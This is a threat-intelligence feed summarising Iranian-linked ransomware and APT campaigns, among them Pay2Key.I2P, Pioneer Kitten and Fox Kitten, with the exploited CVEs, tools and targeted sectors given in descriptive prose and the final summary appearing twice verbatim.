Threats Feed

Since February 2025, the Iranian-aligned Pay2Key.I2P ransomware-as-a-service (RaaS) operation—linked to Fox Kitten APT and Mimic ransomware—has launched ideologically driven attacks against Western targets. With a strong presence on Russian and Chinese darknet forums, the group markets an advanced ransomware builder with capabilities for both Windows and Linux. The payloads use advanced evasion techniques, including dual CMD/PowerShell scripts, Themida packing, and AV bypass tools like “NoDefender.” Over $4 million in ransom payments and 51 successful attacks were recorded in four months. Targets are not specified by country or sector, but the campaign’s rhetoric and infrastructure indicate a focus on geopolitical adversaries of Iran.

Iran-based cyber actors linked to the Iranian government are exploiting organisations across multiple sectors in the US, including education, finance, healthcare, defence, and local government, as well as targets in Israel, Azerbaijan, and the UAE. Since 2017, these actors have focused on gaining and monetising network access, working with ransomware affiliates such as NoEscape, Ransomhouse, and ALPHV (BlackCat). They exploit vulnerabilities in internet-facing services such as Check Point, Palo Alto Networks and Citrix. They also use tools such as AnyDesk, PowerShell, Ligolo and NGROK for persistence and command and control.

Pioneer Kitten, an Iran-based adversary active since 2017, targets North American and Israeli entities of intelligence interest, including technology, government, defense, and healthcare sectors. The group relies on exploiting vulnerabilities in VPNs and network appliances (e.g., CVE-2019-11510, CVE-2019-19781, CVE-2020-5902) for initial access, and uses open-source tools like Ngrok and SSHMinion for SSH tunneling and RDP for hands-on activity. Recently, PIONEER KITTEN was seen selling access to compromised networks on underground forums, indicating an attempt to diversify revenue streams.

Iranian APT groups APT34 and APT33 jointly operated the Fox Kitten campaign from 2017 to 2019, exploiting VPN vulnerabilities (e.g., Pulse Secure CVE-2019-11510, Fortinet CVE-2018-13379) to breach networks across Israel, the US, Gulf states, and Europe. Targeted sectors included IT, telecommunications, oil and gas, aviation, government, and security. The attackers established persistence using custom and open-source tools, including SSH tunnels, RDP proxies, webshells, and credential dumping via Mimikatz and ProcDump. Tools like Ngrok and Serveo enabled data exfiltration. The infrastructure supported both espionage and potential destructive operations tied to malware such as ZeroCleare and Dustman.

Iranian APT groups APT34 and APT33 jointly operated the Fox Kitten campaign from 2017 to 2019, exploiting VPN vulnerabilities (e.g., Pulse Secure CVE-2019-11510, Fortinet CVE-2018-13379) to breach networks across Israel, the US, Gulf states, and Europe. Targeted sectors included IT, telecommunications, oil and gas, aviation, government, and security. The attackers established persistence using custom and open-source tools, including SSH tunnels, RDP proxies, webshells, and credential dumping via Mimikatz and ProcDump. Tools like Ngrok and Serveo enabled data exfiltration. The infrastructure supported both espionage and potential destructive operations tied to malware such as ZeroCleare and Dustman.